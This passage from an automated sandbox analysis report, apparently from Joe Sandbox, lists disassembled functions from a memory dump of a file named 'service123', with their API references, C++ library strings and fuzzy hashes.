Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: b790031ca8e1dcaf8b1ab0504d645c83cbf0988fe1dd433678cfba744e23fc4f
Instruction ID: c6370fbcd8f242438542228a5cb348c68d781863994cdbb072706dc0c1ee27bd
Opcode Fuzzy Hash: b790031ca8e1dcaf8b1ab0504d645c83cbf0988fe1dd433678cfba744e23fc4f
Instruction Fuzzy Hash: 63215E73B0A3149FC300AF1DD88456EFBE4EB85668F94496EE88897716D331D854CB92

Function 6C2BA790 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2BA7AD
wcslen.MSVCRT ref: 6C2BA7FD

Strings

basic_string: construction from null is not valid, xrefs: 6C2BA7D0, 6C2BA820

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 2fc2f4a99f636fa042737be60dcffbb0b4c029cb1357e17b12fc185f68d65140
Instruction ID: 7ee82e0ab006e7dcd223b8219bc850ec09063106d19c429bbaf8bfe55696700e
Opcode Fuzzy Hash: 2fc2f4a99f636fa042737be60dcffbb0b4c029cb1357e17b12fc185f68d65140
Instruction Fuzzy Hash: 211163B19153148BCB10AF6CD48086ABBF4BF45314F02086DE8C99B711D232D955CF96

Function 6C2BA3A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2BA3BD
wcslen.MSVCRT ref: 6C2BA40D

Strings

basic_string: construction from null is not valid, xrefs: 6C2BA3E0, 6C2BA430

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 2fc2f4a99f636fa042737be60dcffbb0b4c029cb1357e17b12fc185f68d65140
Instruction ID: ff15e34c1a2d13c6fdcc656c5e735b593e55e9257dec849df8d948fad2bc1fb0
Opcode Fuzzy Hash: 2fc2f4a99f636fa042737be60dcffbb0b4c029cb1357e17b12fc185f68d65140
Instruction Fuzzy Hash: 291163B19152148BCB10AF6CD48085AFBF4BF45318F02096DE8C99B715D232D955CF96

Function 6C2C96A0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1123COMMON

Download Yara Rule

Strings

-, xrefs: 6C2CA0BE

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 67b6c5acbdc7277f730d5322e1eb0b16a4ae7b2c4209b995aa7a056694f187f0
Instruction ID: 44e60e3c0e462ebee1b4fd4fbf84aef51fefc70c8c513aa2de5c19f5d4bbbdd2
Opcode Fuzzy Hash: 67b6c5acbdc7277f730d5322e1eb0b16a4ae7b2c4209b995aa7a056694f187f0
Instruction Fuzzy Hash: EBA27D70B04259CFDB50DF69C484B8DBBB2AF45329F288758E869AB691C730DC45CF92

Function 6C2C8570 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 1122COMMON

Download Yara Rule

Strings

-, xrefs: 6C2C8F8E

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 79bf929d915c0f63a3b18d9d58fd3cd32340e66182c77d34994d1261727f67cd
Instruction ID: 39538bb05015bbb987b9965c03b44b65e8aaf7a69e64904b63a3e9f4bd68d757
Opcode Fuzzy Hash: 79bf929d915c0f63a3b18d9d58fd3cd32340e66182c77d34994d1261727f67cd
Instruction Fuzzy Hash: E1A29D71B042598FDB50CF68C48078DBBB2AF46325F288759E869AB692D730DC45CF92

Function 6C303440 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

basic_string::_S_construct null not valid, xrefs: 6C3034C0

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: 9ca2e4024a45fe1f111f62b143c8ef1bc0c47c8fab7b7464737a4e3dc4d8133e
Instruction ID: 61c8b8ff20480f410cafb6f2eb3ec8cd6af996199764cecaf7b8be3eab600fe0
Opcode Fuzzy Hash: 9ca2e4024a45fe1f111f62b143c8ef1bc0c47c8fab7b7464737a4e3dc4d8133e
Instruction Fuzzy Hash: B40171B26097409BC3416F5AC084B1BFFE8AF91358F94886DE5C84BB15C736D4488F62

Function 6C2BA720 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2BA73D

Strings

basic_string: construction from null is not valid, xrefs: 6C2BA760

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: b0cd08e23bb8300ea4be1f3823fbc1cd05c5380494780606b0b25c493266c6ad
Instruction ID: f58bd537ac86686b9f57d846dd6aa3a90ae6f64bb87d8188211a5afc5d0db9be
Opcode Fuzzy Hash: b0cd08e23bb8300ea4be1f3823fbc1cd05c5380494780606b0b25c493266c6ad
Instruction Fuzzy Hash: C1F05EB59153188FCB00EF6CC48085ABBF4BF45318F0248ADE8C8AB711D232E959CF96

Function 6C2BA330 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2BA34D

Strings

basic_string: construction from null is not valid, xrefs: 6C2BA370

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: b0cd08e23bb8300ea4be1f3823fbc1cd05c5380494780606b0b25c493266c6ad
Instruction ID: 3e01325e2f5deb8ae4a7fabca41f33337a5d921475cccc845b0ea5aade81dbe8
Opcode Fuzzy Hash: b0cd08e23bb8300ea4be1f3823fbc1cd05c5380494780606b0b25c493266c6ad
Instruction Fuzzy Hash: 11F05EB19152148FCB00EF6CC48085ABBF4BF46318B0208ADE8C9AB711D232ED59CF96

Function 6C2B04F0 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6C2B0548
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2B0550

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 5919df542d813478cd5444f142adaed0b0b023133e624e89aba1f70a74eefc5d
Instruction ID: ef736078bfa08634e63691ac0da2790de4af122762459ce785b5b4ef92df3eb8
Opcode Fuzzy Hash: 5919df542d813478cd5444f142adaed0b0b023133e624e89aba1f70a74eefc5d
Instruction Fuzzy Hash: 270146B6A0A3009FC704DF29D881A9BFBE1BBCA754F14992DE488D7B04C234D8408F97

Function 6C2BC2C0 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6C2BC318
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2BC320

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: a605411d5a8aca5dbc15c4a5122c4d45a5f16cfd5df29f97e709495d4a400238
Instruction ID: e291ffbef91c68f14ce2f00dc3172324312b89ac2a566d23175c3a481ccc54c9
Opcode Fuzzy Hash: a605411d5a8aca5dbc15c4a5122c4d45a5f16cfd5df29f97e709495d4a400238
Instruction Fuzzy Hash: C8015A71A182108BC704DF29D48091ABBE5BBC9708F50896DE488D7310D631D845CF96

Function 6C2D4490 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf4fae8e09b435388d4ebb64479815f3b8f60fa3a1d2d053e9b4920df00581a9
Instruction ID: d03d7bf8750352b3d19532cec4057144a36fff73c5b749bfb9dae53debd01652
Opcode Fuzzy Hash: cf4fae8e09b435388d4ebb64479815f3b8f60fa3a1d2d053e9b4920df00581a9
Instruction Fuzzy Hash: 7282A070E042998FDB11CFA9C48078DBBF1AF59315F2A8259E8A5AF795C334E845CF81

Function 6C2D2A7E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0f76a5744f714253f984127a15cf7a401f544d4d9c7451279119d00c528c9af
Instruction ID: c99c8abe958249199fe7b78cd528f900c3c42ba2048518942f1a478caa474519
Opcode Fuzzy Hash: a0f76a5744f714253f984127a15cf7a401f544d4d9c7451279119d00c528c9af
Instruction Fuzzy Hash: 8072AF70A08399CFDB11CFA8C484B8DBBF1BF29315F158659E8A5AB791C374AC45CB41

Function 6C2D11BE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a4ea61e6e0c725b769fc39fe70c9243ee142e4ad9e72d100c2201a72a56b5ba
Instruction ID: e6c8ae6756526a59fa6696eedec635c93eb9d1563ca1bb1485cd66e16e556f92
Opcode Fuzzy Hash: 9a4ea61e6e0c725b769fc39fe70c9243ee142e4ad9e72d100c2201a72a56b5ba
Instruction Fuzzy Hash: AA72B170E08399CFDB11CFA8C484B8DBBF1AF15325F158659E8A5ABB95C334E885CB41

Function 6C2D1E40 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3594e30445df04e77176308a81b2f7b9418a77fd60aff2db661a25ab7a67a64
Instruction ID: 9b06d7858cc5127fc63e551e03c7882e79fb0e3baa5e94a51702868e3a49b9f5
Opcode Fuzzy Hash: e3594e30445df04e77176308a81b2f7b9418a77fd60aff2db661a25ab7a67a64
Instruction Fuzzy Hash: C87290B0E093998FDB11CFA8C488B8DBBF1AF15315F158659E8A5ABB81C334EC45CB51

Function 6C2D0580 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02d0cac17fedf5586238eed6a7e2f7adb50baa1d72013137fef80f330ad1be17
Instruction ID: 5a6595e253f6efe5b0668eefa7a7c21fafda25a2ae36b9a762839dbc44839d75
Opcode Fuzzy Hash: 02d0cac17fedf5586238eed6a7e2f7adb50baa1d72013137fef80f330ad1be17
Instruction Fuzzy Hash: 5B729C70E093D98FDB11CFA8C084B8DBFF1AF15315F258659E8A5ABBA1C734A845CB41

Function 6C2BF510 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2BF663

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: abd427e2b79155d3af4ba1c334311ef3bee5630da352a7528cdd0af1b25950f3
Opcode Fuzzy Hash: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction Fuzzy Hash: 9E725B78E042598FCB04CFA8C08499EBBF2BF49359F288659E865BB761C731AC41CF51

Function 6C2D77D0 Relevance: 1.9, APIs: 1, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6a425cb709460e953b9595c0f759c6f2c4fb67921a6f44a45672fb4c0cff0e
Instruction ID: fa24805845722102c783fcc23cd4b7e50a2b2248dd5316c0bb4f881fdb64c62b
Opcode Fuzzy Hash: ba6a425cb709460e953b9595c0f759c6f2c4fb67921a6f44a45672fb4c0cff0e
Instruction Fuzzy Hash: FA52E170A0434D9FCB00CF68D48079DBFB1AF15728F2A865AEC64AB795D339E845CB91

Function 6C2C2110 Relevance: 1.6, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction ID: 11469cba943b9c130f27b72ed46536eecb066f1fc3b77a4783263545c3d5d515
Opcode Fuzzy Hash: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction Fuzzy Hash: 81E18AB5E052598FCB51CFA8C484A8DBBF2BF49314F189365E865A7391CB34AD01CF62

Function 6C2EDA20 Relevance: 1.6, APIs: 1, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction ID: a6282a707a2da268184fb92729f114502eebd10d3fbf3e7f8ca17d5b3a936b35
Opcode Fuzzy Hash: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction Fuzzy Hash: C8D14A75A042598FCB01CF68C4806DDBBF1BF8D324F988269E865BB791D335E945CBA0

Function 6C2E9910 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

, xrefs: 6C2E99A8

Memory Dump Source

Source File: 00000005.00000002.2697212621.000000006C291000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C290000, based on PE: true

Associated: 00000005.00000002.2697199423.000000006C290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697284477.000000006C36D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697299649.000000006C36F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697330849.000000006C3B8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697344007.000000006C3B9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2697356645.000000006C3BC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c290000_service123.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 67d8fedad5969f6225c5c1af9139deac7227b683a55bad58d8362aa624c4ec2d
Instruction ID: b774ac31f520d32a14597d97af042fb09b34e89f9e7409b513249db1433b70fb
Opcode Fuzzy Hash: 67d8fedad5969f6225c5c1af9139deac7227b683a55bad58d8362aa624c4ec2d
Instruction Fuzzy Hash: 80215E71A042098FCB04FF39C88499BB7F5AF89248F51892EEC809B755D734D849CFA2

Function 6C2AE8C0 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

__gnu_cxx::__concurrence_lock_error, xrefs: 6C2AE900

Memory Dump Source

